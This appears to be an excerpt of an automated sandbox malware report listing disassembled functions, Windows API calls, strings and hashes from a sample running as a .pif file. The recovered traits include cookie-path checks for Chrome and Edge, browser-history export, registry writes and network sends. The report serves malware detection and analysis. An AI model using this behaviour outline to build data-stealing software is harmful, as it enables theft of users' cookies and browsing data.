• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
• Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
• Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
• Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 274C715C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 274C717F
  • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 274C71A5
• _free.LIBCMT ref: 274C71B8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 274C71C7
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: e06a2bbc45e0ba1e633e5937a308df93f1b437bf01c7cfd15176df4786a4909c
• Instruction ID: 42e075016fdbb3ae87e6179e22d15777e4882a289eacc4e2440e4e2bea16e44b
• Opcode Fuzzy Hash: e06a2bbc45e0ba1e633e5937a308df93f1b437bf01c7cfd15176df4786a4909c
• Instruction Fuzzy Hash: E901847A602226FF23139ABB4C89DBB6E6DDFC2DA5714016DBD04C7300EE648C0285B1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
• _free.LIBCMT ref: 004482D3
• _free.LIBCMT ref: 004482FA
• SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
• SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
• Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
• Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
• Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,?,00000000,274C636D,274C5713,00000000,?,274C2249,?,?,274C1D66,00000000,?,?,00000000), ref: 274C5B7F
• _free.LIBCMT ref: 274C5BB4
• _free.LIBCMT ref: 274C5BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C5BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C5BF1
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: cefdbbc3e4fd2fbabef0c5b1286287b33e2ead2d73fc9893944415ac4722124d
• Instruction ID: 0db4a7df8e95a03e5eb5c9f680dd37f3bfd23d773c927613ae50c0eaaa73431e
• Opcode Fuzzy Hash: cefdbbc3e4fd2fbabef0c5b1286287b33e2ead2d73fc9893944415ac4722124d
• Instruction Fuzzy Hash: 2C01283E105621E79303E6391C85EEFEE699BD2974B31012CF81596242FE6CCA424161
Uniqueness
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
• Opcode ID: c512f369c67f66082f7d173342797144b7094dc1fe3561dd0d026d46a773336a
• Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
• Opcode Fuzzy Hash: c512f369c67f66082f7d173342797144b7094dc1fe3561dd0d026d46a773336a
• Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,?,?,?,?,274C10DF,?,?,?,00000000), ref: 274C1E9A
• lstrcatW.KERNEL32(?,?), ref: 274C1EAC
• lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EB3
• lstrlenW.KERNEL32(?,?,274C10DF,?,?,?,00000000), ref: 274C1EC8
• lstrcatW.KERNEL32(?,274C10DF), ref: 274C1ED3
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 5ed89a095bb0fabda72adffcdbe1871794baf1ade42ac012e369fbd0f977a088
• Instruction ID: efc67c36c40493b3de9fd5884a8d09407d7d24d829a1dc17f470f1967a153083
• Opcode Fuzzy Hash: 5ed89a095bb0fabda72adffcdbe1871794baf1ade42ac012e369fbd0f977a088
• Instruction Fuzzy Hash: F3F08936100110BBE721771BAC85EBF777CEFC6A65F04001DFA08831909F58684296B5
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 004509D4
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
• _free.LIBCMT ref: 004509E6
• _free.LIBCMT ref: 004509F8
• _free.LIBCMT ref: 00450A0A
• _free.LIBCMT ref: 00450A1C
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
• Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
• Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 274C91D0
  • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
  • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
• _free.LIBCMT ref: 274C91E2
• _free.LIBCMT ref: 274C91F4
• _free.LIBCMT ref: 274C9206
• _free.LIBCMT ref: 274C9218
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 388a06e3406ec610254cfcd40c4e5857bc95e7f0ef0dbdbab6f1a7825174acaa
• Instruction ID: 9bc4d51e0f18918412e20ebdc0f734e3c2bf4180fd9370d3d5e388146f048aea
• Opcode Fuzzy Hash: 388a06e3406ec610254cfcd40c4e5857bc95e7f0ef0dbdbab6f1a7825174acaa
• Instruction Fuzzy Hash: F5F0C279605650EB8611EB98D5C7C8BBBE9EB50715B20080DF988C7600CF38F8C08A50
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00444066
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
• _free.LIBCMT ref: 00444078
• _free.LIBCMT ref: 0044408B
• _free.LIBCMT ref: 0044409C
• _free.LIBCMT ref: 004440AD
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
• Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
• Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 274C536F
  • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
  • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
• _free.LIBCMT ref: 274C5381
• _free.LIBCMT ref: 274C5394
• _free.LIBCMT ref: 274C53A5
• _free.LIBCMT ref: 274C53B6
Memory Dump Source
• Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
• Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: f98f1cc7cdaaea028880fe56308ffd759658519998cfb7e7dc8c84f575c9adb3
• Instruction ID: cc001e8d847265385114d0b6d7bc46ec90dd89c269d3d36e6aa7aa966b91fd07
• Opcode Fuzzy Hash: f98f1cc7cdaaea028880fe56308ffd759658519998cfb7e7dc8c84f575c9adb3
• Instruction Fuzzy Hash: 74F054B8815134EB8A06AF28959748D7FB1F715A58765020EF89493354DF3D05C18B85
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsend
• String ID: XQG$NG$PG
• API String ID: 1634807452-3565412412
• Opcode ID: 39074371893d74fb2ec12acfcc5a34c42aad43bb34f679717c647b95d9b37a6d
• Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
• Opcode Fuzzy Hash: 39074371893d74fb2ec12acfcc5a34c42aad43bb34f679717c647b95d9b37a6d
• Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
Uniqueness
Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
Strings
Memory Dump Source
• Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: `#D$`#D
• API String ID: 885266447-2450397995
• Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
• Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
• Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
• Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 00443475
                                                                                                                                                                    • _free.LIBCMT ref: 00443540
                                                                                                                                                                    • _free.LIBCMT ref: 0044354A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                    • API String ID: 2506810119-1700383835
                                                                                                                                                                    • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                    • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                                                                                                                    • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000104), ref: 274C4C1D
                                                                                                                                                                    • _free.LIBCMT ref: 274C4CE8
                                                                                                                                                                    • _free.LIBCMT ref: 274C4CF2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif
                                                                                                                                                                    • API String ID: 2506810119-1700383835
                                                                                                                                                                    • Opcode ID: 51c77eb4cf56bb8937da80d4f6589f8468c64812ba4cd2c9147a01790a70cf5b
                                                                                                                                                                    • Instruction ID: f1f40eb74feee057600cb17146ae0ea93cd7bb3f62834aad1815ffadc1a4dd59
                                                                                                                                                                    • Opcode Fuzzy Hash: 51c77eb4cf56bb8937da80d4f6589f8468c64812ba4cd2c9147a01790a70cf5b
                                                                                                                                                                    • Instruction Fuzzy Hash: 54316DB9A00218EFDB12DB9D8A81DDEBFF8EB95714F51406EE90497310DB748A81CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                                                                                                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                                                                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                                                                                                                    • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                    • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                                    • API String ID: 368326130-3219657780
                                                                                                                                                                    • Opcode ID: dbd999bfeb27504071707fe7b73e87745f9622d3df09ef3bcbac7d8253451524
                                                                                                                                                                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                                                                                                                    • Opcode Fuzzy Hash: dbd999bfeb27504071707fe7b73e87745f9622d3df09ef3bcbac7d8253451524
                                                                                                                                                                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcslen.LIBCMT ref: 004162F5
                                                                                                                                                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                    • String ID: !D@$okmode$PG
                                                                                                                                                                    • API String ID: 3411444782-3370592832
                                                                                                                                                                    • Opcode ID: a04d05716512b7121ee97be2d66f1905d69fbc859f79e27ede2103061701d044
                                                                                                                                                                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                                                                                                                    • Opcode Fuzzy Hash: a04d05716512b7121ee97be2d66f1905d69fbc859f79e27ede2103061701d044
                                                                                                                                                                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                                                                                                                    Strings
                                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                    • API String ID: 1174141254-1980882731
                                                                                                                                                                    • Opcode ID: 75dbce385c2a8ae9d20c166458dc6612097bb3936f990f691a4e0541a73d91d3
                                                                                                                                                                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                                                                                                                    • Opcode Fuzzy Hash: 75dbce385c2a8ae9d20c166458dc6612097bb3936f990f691a4e0541a73d91d3
                                                                                                                                                                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                                                                                                                    Strings
                                                                                                                                                                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                                                                                                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExistsFilePath
                                                                                                                                                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
• API String ID: 1174141254-1980882731
• Opcode ID: be62f0baf0bcad7a1b9072f9f99ce740f4c070c9bc296d2e33669ce4abd8d70a
• Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
• Opcode Fuzzy Hash: be62f0baf0bcad7a1b9072f9f99ce740f4c070c9bc296d2e33669ce4abd8d70a
• Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
• wsprintfW.USER32 ref: 0040B1F3
  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
Strings
Memory Dump Source
• Source File: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
